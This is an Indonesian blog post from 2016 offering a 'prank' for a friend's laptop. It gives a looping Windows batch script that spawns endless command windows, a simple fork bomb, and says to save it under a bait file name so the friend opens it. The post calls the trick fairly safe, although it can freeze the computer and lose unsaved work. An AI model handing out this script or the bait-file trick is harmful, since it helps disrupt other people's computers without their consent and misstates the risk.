Saturday, June 18, 2016

Mau isengin atau jailin laptop teman? Ini dia caranya

Tempat yang tepat untuk belajar Ilmu Komputer - Mau isengin atau jailin laptop teman? Ini dia caranyaHallo pemirsa! Pada hari yang baru dan cerah ini, pastinya anda mempunyai semangat yang baru. Dan pada hari ini saya akan membagikan sebuah artikel yang sangat bermanfaat bagi anda yang ingin jailin atau isengin laptop teman anda, yaitu Cara mudah isengin atau jailin laptop teman. Biasanya cara orang kalau isengin laptop temen adalah diumpetin laptopnya. Namun disini saya akan membagikan cara yang lebih keren untuk isengin laptop temen dengan menggunakan notepad atau text document. Dan yang pasti cara ini lumayan aman ya hehehe. Udah gak sabar lagi kan? mari kita simak caranya di bawah ini.


Cara cepat dan mudah isengin atau jailin laptop teman


1. Buka notepad anda atau anda bisa menggunakan cara cepatnya, yaitu tekan tombol windows + R lalu ketik "notepad" pada kolom yang disediakan

2. Silahkan ketik kode di bawah ini ke notepad anda

@echo off
:start
start
goto start
3. Setelah anda mengketik kodenya pada notepad anda, simpan file tersebut dengan save as dan diakhir nama filenya tambahkan ".bat"
Note : File bat ini adalah file extensi yang dapat dibaca oleh command prompt. contoh namanya "Jangan klik file ini.bat" (Tanpa tanda kutip)

4. Setelah file tersimpan, silahkan tunggu teman anda membuka filenya dan lihatlah reaksi teman anda. hehehe.



Sekian artikel yang saya bagikan kepada anda tentang Mau isengin atau jailin laptop teman? Ini dia caranya. Jika masih kurang jelas atau ada pertanyaan, silahkan berkomentar dengan kata - kata yang sopan di kolom komentar yang sudah disediakan. Jika artikel ini bermanfaat bagi anda silahkan share/bagikan kepada teman anda yang kekurangan gizi artikel yang bermanfaat :). Jika anda ingin mengetahui artikel terbaru dari blog ini silahkan anda follow saya melalui Google+, Karena nilai (+) selalu bermanfaat kepada orang yang mendapat nilai (-) hehehe.
Load disqus comments

0 comments